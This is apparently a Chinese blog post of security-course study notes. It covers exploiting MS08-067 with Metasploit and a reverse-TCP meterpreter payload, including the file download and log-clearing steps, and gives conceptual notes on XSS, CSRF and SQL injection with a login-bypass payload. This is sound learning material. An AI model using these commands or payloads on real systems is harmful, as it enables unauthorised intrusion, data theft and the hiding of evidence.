360网络安全学院学习笔记(二)

配置(Metasploit)

Metasploit路径:/usr/share
操作:search ms08-067(漏洞利用)

use exploit/windows/smb/ms08-067_netapi

set payload windows/meterpreter/reverse_tcp(部署)

set lhost 主机IP

set rhost 靶机IP

show targets(显示靶机)

set target 10

exploit(进入meterpreter(后渗透攻击模块))

进行远程操作:cat、download、search等

clearve(清除日志)

XSS漏洞原理与实践

由于web应用程序对用户输入过滤不足导致,攻击者利用网站漏洞将恶意代码载入,窃取cookie、session等信息或调用js下载木马。
分类:反射型、持久性、DOM型
XXS漏洞利用可通过编码转换绕过过滤指令

CSRF漏洞

浏览器同源策略:
A网页与B网页的协议相同、域名相同、端口相同时,才可以从B网页打开A网页
的cookie,A与B同源

同源策略目的:
为了保证用户的信息安全,防止恶意的网站窃取数据

Cookie属性:
Domain、Path

浏览器提交cookie条件:
当前域名或父域名下的Cookie
当前路径或父路径的Cookie

Csrf跨站请求伪造
原理:黑客利用已登录的用户,诱使其访问或者登录某个构造好恶意脚本的代
码或链接,然后在用户不知情的情况下,以用户的名义执行非法操作

SQL注入

所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。

SQL注入步骤

1.寻找注入点,构造特殊的语句
传入SQL语句可控参数分为两类
(1)数字类型,参数不用被引号括起来,如?id=1
(2)其他类型,参数要被引号扩起来,如?name=“phone”

2.用户构造SQL语句(如:‘or 1=1#;admin’#(这个注入又称PHP的万能密码,是已知用户名的情况下,可绕过输入密码)以后再做解释)

3.将SQL语句发送给DBMS数据库

4.DBMS收到返回的结果,并将该请求解释成机器代码指令,执行必要得到操作

5.DBMS接受返回结果,处理后,返回给用户

SQL注入危害
绕过登陆验证:使用万能密码登录网站后台等
获取敏感数据:获取网站管理员账号,密码等
文件系统操作:列目录,读取、写入文件等
注册表操作:读取、写入、删除注册表等
执行系统命令操作:远程执行命令

  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值